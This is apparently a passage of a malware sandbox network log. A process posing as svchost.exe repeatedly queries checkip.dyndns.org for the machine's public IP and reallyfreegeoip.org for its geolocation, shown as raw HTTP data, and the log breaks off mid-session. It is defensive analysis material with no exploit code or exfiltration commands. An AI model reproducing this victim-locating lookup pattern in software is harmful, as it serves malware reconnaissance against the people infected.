Jan 10, 2025 22:13:39.429843903 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:13:39.911894083 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: db9879f29e5d524207902668f7d2908a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49711	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:40.539737940 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:41.009404898 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d91062c7f55c498e0ae1791c6ba4333b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49713	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:41.654685020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:42.112885952 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 691ae9fcc60842814b6fa99a243ea089 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:42.748915911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:43.228657007 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 52df4c8d5446dca57cb9729e945c82dd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49717	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:43.851037025 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:44.326091051 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 151268c9bb8de59c5172470a876d4333 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49720	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:44.968206882 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:45.424164057 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c2155e3bb46179f8a2e0dbe9d1feda52 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:37 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:13:37 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858406 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AmAAaRBlBXM47%2FsoAZcklD891OLfng6tYWuchJvCn1G%2FboGmeGHjpeL6zVY9S7pTSTKRRQYHmXSskwqRl9T%2FslubfrfvbWVsT7qEoEi2VURCQC%2BUcJ43HiuzHwsHC3uE8MRiBYUN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac08f8758c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2035&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1420233&cwnd=223&unsent_bytes=0&cid=9186f0f9f3ec6dd4&ts=344&x=0"
2025-01-10 21:13:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:38 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:13:38 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858407 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tRzGsE6iXKw1VKEQ8pZecYmkXE3%2FUVIeJFhElylvWqJ%2FAEPi%2FV0DP5sTm3%2FHBot3x0CXp6Qkl2bFWERKGbwSuxo3N4ipCgc8d04D6GOYxmgxJcuegNlUxD6Ea6h5EbJl9pfvRFvh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac0dea210f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1502&min_rtt=1495&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1953177&cwnd=231&unsent_bytes=0&cid=360a18799ec0e64b&ts=153&x=0"
2025-01-10 21:13:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49708	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:13:39 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858408 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g1VA0C5QqwFs%2FHkOwRM5nI31BGJ%2BiAP%2BXpk%2FAiLyIQm0pNXPkFEYVu%2F0lOXsSeteycsUjElNaIjHmRo4hB2yz5Z42n7i%2FS7uVXStEC8ruGr34qiAt67046NFaiUokoqBrrzibQGX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac14fc09c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1637&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1733966&cwnd=244&unsent_bytes=0&cid=27c2a70bc22f426d&ts=165&x=0"
2025-01-10 21:13:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49710	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:13:40 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858409 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtOJuvSRUET7FfaSUbayIlCtw7lJYp2UA2HRxT%2BLvrqx3T54PhUfpNkhV2vlXDQ6R7S6tQw54zXp5wVqSa%2BeA5If4RwDYC%2BCpDU92w6ISP%2B5NkcznaEY8%2FRaqa3vPptctW48i%2BzG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac1bea698c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1979&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1475492&cwnd=223&unsent_bytes=0&cid=438f69962d16c607&ts=161&x=0"
2025-01-10 21:13:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49712	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:41 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 21:13:41 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858410 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MXoNF6RnHbjw0Q7CkpW1T5%2B5KBD9aabbEsxhyXlPBsGYNuolKqAwYWZS4kbbgfsXyMfiI%2FTiYuWXn4%2FRaBd8YtYesVOV5TpYz39ZoM%2FTz0FrolIrrYY%2BaH4gDt%2FLwTq9UbRPwDx2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac22dcb643ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1689&rtt_var=649&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1665715&cwnd=228&unsent_bytes=0&cid=83ede1b3c406f684&ts=157&x=0"
2025-01-10 21:13:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49714	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:42 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:13:42 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858411 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JBQNV6QFiBKUpq9D7S1n0lSQDeLhanLdQcdWUDLvYQYxkdLkUOYjsLJSxKebQVyAw6Omcj33BmSExXsNuaOIGkLyJcFxAMg1r22yAAqhtzKnp%2Fv%2BD1FHhVPIOxphOqPEGRLBy%2B70"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac29ac967d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1970&rtt_var=795&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1329085&cwnd=244&unsent_bytes=0&cid=b682b0279603678a&ts=171&x=0"
2025-01-10 21:13:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49716	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:43 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:13:43 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:43 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1858412 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J7aRSPLh1nADGVIB1ugGOcXlpLtOqmNfYxRhCQeD%2BBVVVaoZw7LHonv4PXnVrH9rcUPyw94tVnxzXQ3ltSMd1J8g3TArYApeDzqWWuUqbmfzlNWfo7FabORuOa2QjjdJGkzs%2Fu4k"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffac30ae00c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1748502&cwnd=244&unsent_bytes=0&cid=7c19c0405ba21e69&ts=158&x=0"
2025-01-10 21:13:43 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49718	104.21.80.1	443	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:13:44 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
